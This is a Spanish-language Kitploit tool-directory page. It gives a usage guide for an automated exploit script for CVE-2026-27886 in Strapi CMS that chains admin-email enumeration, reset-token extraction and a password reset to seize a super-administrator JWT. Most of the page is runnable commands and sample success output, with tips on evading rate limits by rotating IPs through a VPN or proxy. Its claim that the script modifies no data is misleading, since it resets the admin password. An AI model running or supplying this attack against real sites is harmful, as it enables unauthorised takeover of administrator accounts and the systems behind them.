Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-27886-PoC-Account-Takeover — Account takeover full PoC for CVE-2026-27886 in Strapi CMS | Kitploit
Herramientas/GitHubGitHub/thesw0rd/cve-2026-27886-poc-account-takeover
ReconnaissancePassword AttacksVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubthesw0rd/cve-2026-27886-poc-account-takeover

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

CVE-2026-27886-PoC-Account-Takeover

Account takeover full PoC for CVE-2026-27886 in Strapi CMS

Ver Repositorio
2hace 2 mesesAún no revisado
Compartir

CVE-2026-27886 Exploit Automatizado - Guía de Uso

Qué Hace Este Script

Automatiza la cadena completa de apropiación de cuentas en 4 grupos de peticiones HTTP:

  1. Verificación de Vulnerabilidad - Confirma que el objetivo es vulnerable
  2. Enumeración de Correo Electrónico - Extrae el correo del administrador mediante un oráculo booleano (~500 peticiones)
  3. Activación del Restablecimiento de Contraseña - Inicia el flujo de recuperación de contraseña de Strapi
  4. Exfiltración del Token - Roba el token de restablecimiento de 40 caracteres (~320 peticiones)
  5. Apropiación de la Cuenta - Usa el token robado para obtener un JWT de Súper Administrador

Uso Básico

Modo Solo-Verificación (Seguro)

Comprueba si el objetivo es vulnerable sin explotarlo:

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles --verify-only

Explotación Completa (Más Rápida)

Automatiza todo si no conoces el correo del administrador:

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles

Salida:

root@kitploit:~
[+] Target: https://target/api/articles
[+] Base URL: https://target
[*] Verifying vulnerability...
    [+] Vulnerable: baseline=12, where_test=0
[*] Enumerating admin email...
    [email protected]
[*] Triggering password reset for [email protected]...
    [+] Password reset triggered (HTTP 204)
[*] Extracting 40-char reset token...
    [100%] d1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a
[*] Resetting password with stolen token...
    [+] Password reset successful!
    [+] JWT: eyJhbGciOiJIUzI1NiIs...
    [+] User: [email protected] (ID: 1)

[+] SUCCESS! Admin account compromised.
[+] JWT Token:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

Omitir Enumeración de Correo (Más Rápido)

Si ya conoces el correo del administrador (ahorra ~500 peticiones):

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles \
  --email [email protected]

Contraseña Personalizada

Establece una contraseña personalizada en lugar de la predeterminada:

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles \
  --email [email protected] \
  --password "MyPassword123!"

Añadir Retardos (Evitar Límites de Tasa)

Si el objetivo tiene limitación de tasa:

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles \
  --delay 0.1

Esto añade 100ms entre cada petición (~2-3 minutos para la explotación completa).

URL Base Explícita

Si los endpoints /admin/* están en un host diferente:

root@kitploit:~
./cve-2026-27886-exploit.py https://api.target/articles \
  --base-url https://admin.target

Problemas Comunes

"Non-JSON response"

  • Endpoint incorrecto (no es una colección de Content API de Strapi)
  • Prueba con: https://target/api/products, https://target/api/articles, etc.

"Failed to enumerate email"

  • La colección está vacía (sin claves foráneas updated_by_id)
  • El rol de administrador no coincide con nadie en la base de datos
  • Prueba con un endpoint diferente si existen varios

"Failed to extract reset token"

  • El restablecimiento de contraseña no se activó
  • El correo del administrador es diferente al supuesto
  • El token expiró (inténtalo de nuevo, dura ~24 horas por defecto)

Limitación de tasa

  • Añade --delay 0.05 o más
  • O usa una VPN/proxy para rotar direcciones IP

Notas de Seguridad

Este script:

  • ✅ Solo hace peticiones GET/POST (sin modificación de datos)
  • ✅ Apunta únicamente a la omisión del parámetro de consulta vulnerable de Strapi
  • ✅ Usa los endpoints legítimos de restablecimiento de contraseña de Strapi
  • ✅ No deja artefactos almacenados en el objetivo
  • ⚠️ ES RUIDOSO - Hace más de 800 peticiones en secuencia (evidente en los registros)
Descargar herramienta